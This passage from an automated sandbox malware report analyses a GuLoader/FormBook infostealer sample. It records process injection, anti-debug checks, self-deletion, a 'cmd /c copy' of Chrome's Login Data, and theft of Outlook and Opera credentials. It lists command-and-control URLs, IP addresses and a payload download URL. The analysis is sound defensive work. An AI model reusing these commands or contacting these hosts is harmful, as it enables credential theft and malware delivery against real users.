        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E966BDE mov ebx, dword ptr fs:[00000030h]10_2_1E966BDE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E966BDE mov eax, dword ptr fs:[00000030h]10_2_1E966BDE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BEBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8BEBC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EFBC0 mov ecx, dword ptr fs:[00000030h]10_2_1E8EFBC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EFBC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EFBC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EFBC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EFBC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8FBBC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8FBBC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBBC0 mov ecx, dword ptr fs:[00000030h]10_2_1E8FBBC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8FBBC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FBC2 mov eax, dword ptr fs:[00000030h]10_2_1E93FBC2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]10_2_1E944BC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]10_2_1E944BC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]10_2_1E944BC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]10_2_1E944BC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E8BD1 mov eax, dword ptr fs:[00000030h]10_2_1E8E8BD1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E8BD1 mov eax, dword ptr fs:[00000030h]10_2_1E8E8BD1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1BE7 mov eax, dword ptr fs:[00000030h]10_2_1E8D1BE7
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1BE7 mov eax, dword ptr fs:[00000030h]10_2_1E8D1BE7
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F5BE0 mov eax, dword ptr fs:[00000030h]10_2_1E8F5BE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F5BE0 mov eax, dword ptr fs:[00000030h]10_2_1E8F5BE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994BE0 mov eax, dword ptr fs:[00000030h]10_2_1E994BE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h]10_2_1E8B7BF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7BF0 mov ecx, dword ptr fs:[00000030h]10_2_1E8B7BF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h]10_2_1E8B7BF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h]10_2_1E8B7BF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94DB1B mov eax, dword ptr fs:[00000030h]10_2_1E94DB1B
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EEB1C mov eax, dword ptr fs:[00000030h]10_2_1E8EEB1C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BCB1E mov eax, dword ptr fs:[00000030h]10_2_1E8BCB1E
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h]10_2_1E8C8B10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h]10_2_1E8C8B10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h]10_2_1E8C8B10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]10_2_1E8D0B10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]10_2_1E8D0B10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]10_2_1E8D0B10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]10_2_1E8D0B10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E901B0F mov eax, dword ptr fs:[00000030h]10_2_1E901B0F
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E901B0F mov eax, dword ptr fs:[00000030h]10_2_1E901B0F
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FCB20 mov eax, dword ptr fs:[00000030h]10_2_1E8FCB20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h]10_2_1E94CB20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h]10_2_1E94CB20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h]10_2_1E94CB20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94DB2A mov eax, dword ptr fs:[00000030h]10_2_1E94DB2A
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94FB45 mov eax, dword ptr fs:[00000030h]10_2_1E94FB45
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess queried: DebugPort
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E902EB0 NtProtectVirtualMemory,LdrInitializeThunk,10_2_1E902EB0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02322AD2 RtlAddVectoredExceptionHandler,2_2_02322AD2

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Benign windows process drops PE filesShow sources
        Source: C:\Windows\explorer.exeFile created: c8ahotgz8h.exe.14.drJump to dropped file
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeNetwork Connect: 88.99.22.5 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 172.120.157.187 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 116.62.216.226 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 172.67.164.153 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 104.21.76.223 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 66.29.140.185 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 81.2.194.128 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.250 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 164.155.212.139 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 136.143.191.204 80Jump to behavior
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D50000Jump to behavior
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Writes to foreign memory regionsShow sources
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF788EE0000Jump to behavior
        Injects a PE file into a foreign processesShow sources
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF788EE0000 value starts with: 4D5AJump to behavior
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeThread register set: target process: 4644Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4644Jump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" Jump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" Jump to behavior
        Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmpBinary or memory string: Program Manager
        Source: explorer.exe, 0000000E.00000000.47858819329.0000000004840000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmpBinary or memory string: 1Progman
        Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 0000000E.00000000.47768699367.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47813132765.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48048687198.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47865140469.0000000009713000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndH
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected Generic DropperShow sources
        Source: Yara matchFile source: Process Memory Space: Zr26f1rL6r.exe PID: 6600, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4624, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: c8ahotgz8h.exe PID: 5908, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: c8ahotgz8h.exe PID: 2508, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: c8ahotgz8h.exe PID: 7388, type: MEMORYSTR
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
        GuLoader behavior detectedShow sources
        Source: Initial fileSignature Results: GuLoader behavior
        Tries to steal Mail credentials (via file / registry access)Show sources
        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)Show sources
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsShared Modules1Registry Run Keys / Startup Folder1Process Injection712Virtualization/Sandbox Evasion22OS Credential Dumping1Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution1DLL Side-Loading1Registry Run Keys / Startup Folder1Process Injection712LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol15SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsSystem Information Discovery4SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528518 Sample: Zr26f1rL6r.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 51 www.braxtynmi.xyz 2->51 53 www.topwowshopping.store 2->53 55 31 other IPs or domains 2->55 71 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 81 11 other signatures 2->81 11 Zr26f1rL6r.exe 1 2->11         started        signatures3 77 Performs DNS queries to domains with low reputation 51->77 79 Tries to resolve many domain names, but no domain seems valid 53->79 process4 signatures5 99 Tries to detect Any.run 11->99 101 Hides threads from debuggers 11->101 14 Zr26f1rL6r.exe 6 11->14         started        process6 dnsIp7 63 atseasonals.com 107.6.148.162, 443, 49812, 49837 SINGLEHOP-LLCUS United States 14->63 103 Modifies the context of a thread in another process (thread injection) 14->103 105 Tries to detect Any.run 14->105 107 Maps a DLL or memory area into another process 14->107 109 3 other signatures 14->109 18 explorer.exe 3 6 14->18 injected signatures8 process9 dnsIp10 57 growebox.com 81.2.194.128, 49816, 80 INTERNET-CZKtis238403KtisCZ Czech Republic 18->57 59 www.ayudavida.com 164.155.212.139, 49817, 80 IKGUL-26484US South Africa 18->59 61 11 other IPs or domains 18->61 49 C:\Users\user\AppData\...\c8ahotgz8h.exe, PE32 18->49 dropped 83 System process connects to network (likely due to code injection or exploit) 18->83 85 Benign windows process drops PE files 18->85 23 rundll32.exe 1 12 18->23         started        26 c8ahotgz8h.exe 1 18->26         started        28 c8ahotgz8h.exe 1 18->28         started        30 c8ahotgz8h.exe 1 18->30         started        file11 signatures12 process13 signatures14 87 System process connects to network (likely due to code injection or exploit) 23->87 89 Tries to steal Mail credentials (via file / registry access) 23->89 91 Self deletion via cmd delete 23->91 97 5 other signatures 23->97 32 cmd.exe 2 23->32         started        35 cmd.exe 1 23->35         started        37 firefox.exe 23->37         started        93 Tries to detect Any.run 26->93 95 Hides threads from debuggers 26->95 39 c8ahotgz8h.exe 6 26->39         started        41 c8ahotgz8h.exe 6 28->41         started        43 c8ahotgz8h.exe 30->43         started        process15 signatures16 65 Tries to harvest and steal browser information (history, passwords, etc) 32->65 45 conhost.exe 32->45         started        47 conhost.exe 35->47         started        67 Tries to detect Any.run 39->67 69 Hides threads from debuggers 39->69 process17

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Zr26f1rL6r.exe40%VirustotalBrowse
        Zr26f1rL6r.exe20%ReversingLabsWin32.Trojan.GuLoader

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Grt4lhl\c8ahotgz8h.exe20%ReversingLabsWin32.Trojan.GuLoader

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        15.2.rundll32.exe.488796c.4.unpack100%AviraTR/Dropper.GenDownload File
        15.2.rundll32.exe.540a58.0.unpack100%AviraTR/Dropper.GenDownload File
        25.0.firefox.exe.4009796c.0.unpack100%AviraTR/Dropper.GenDownload File
        25.0.firefox.exe.4009796c.1.unpack100%AviraTR/Dropper.GenDownload File
        25.2.firefox.exe.4009796c.0.unpack100%AviraTR/Dropper.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        www.lopsrental.lease3%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin0%Avira URL Cloudsafe
        http://www.hsbp.online/0%Avira URL Cloudsafe
        http://www.hsbp.online0%Avira URL Cloudsafe
        https://atseasonals.com/O0%Avira URL Cloudsafe
        http://www.inklusion.online/0%Avira URL Cloudsafe
        https://atseasonals.com/V0%Avira URL Cloudsafe
        www.ayudavida.com/n8ds/0%Avira URL Cloudsafe
        http://www.mackthetruck.com0%Avira URL Cloudsafe
        http://schemas.micro0%Avira URL Cloudsafe
        http://www.stylesbykee.com/n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z0%Avira URL Cloudsafe
        https://atseasonals.com/(C0%Avira URL Cloudsafe
        http://www.hsbp.online/n8ds/J0%Avira URL Cloudsafe
        http://www.hsbp.online/n8ds/0%Avira URL Cloudsafe
        http://www.growebox.com/n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z0%Avira URL Cloudsafe
        http://www.unitedmetal-saudi.com/n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez0%Avira URL Cloudsafe
        https://atseasonals.com/GHrtt/bin_kbJoepxz175.binv0%Avira URL Cloudsafe
        https://atseasonals.com/GHrtt/bin_kbJoepxz175.binr0%Avira URL Cloudsafe
        https://word.office.comERM0%Avira URL Cloudsafe
        http://www.helpcloud.xyz/n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez0%Avira URL Cloudsafe
        http://www.jamiecongedo.com/n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX100%Avira URL Cloudmalware
        https://atseasonals.com/GHrtt/bin_kbJoepxz175.binz0%Avira URL Cloudsafe
        https://atseasonals.com/GHrtt/bin_kbJoepxz175.binf0%Avira URL Cloudsafe
        https://atseasonals.com/GHrtt/bin_kbJoepxz175.binc0%Avira URL Cloudsafe
        https://atseasonals.com/GHrtt/bin_kbJoepxz175.binh0%Avira URL Cloudsafe
        http://www.divorcefearfreedom.com/n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv90%Avira URL Cloudsafe
        http://www.lopsrental.lease/n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z0%Avira URL Cloudsafe
        http://www.inklusion.online0%Avira URL Cloudsafe
        http://www.inklusion.online/n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez0%Avira URL Cloudsafe
        https://atseasonals.com/j0%Avira URL Cloudsafe
        http://www.inklusion.online/n8ds/0%Avira URL Cloudsafe
        https://atseasonals.com/0%Avira URL Cloudsafe
        https://atseasonals.com/GHrtt/bin_kbJoepxz175.binsj0%Avira URL Cloudsafe
        http://www.ayudavida.com/n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z0%Avira URL Cloudsafe
        http://www.topwowshopping.store/n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z0%Avira URL Cloudsafe
        https://atseasonals.com/GHrtt/bin_kbJoepxz175.binN0%Avira URL Cloudsafe
        https://atseasonals.com/r0%Avira URL Cloudsafe
        https://excel.office.comR0%Avira URL Cloudsafe
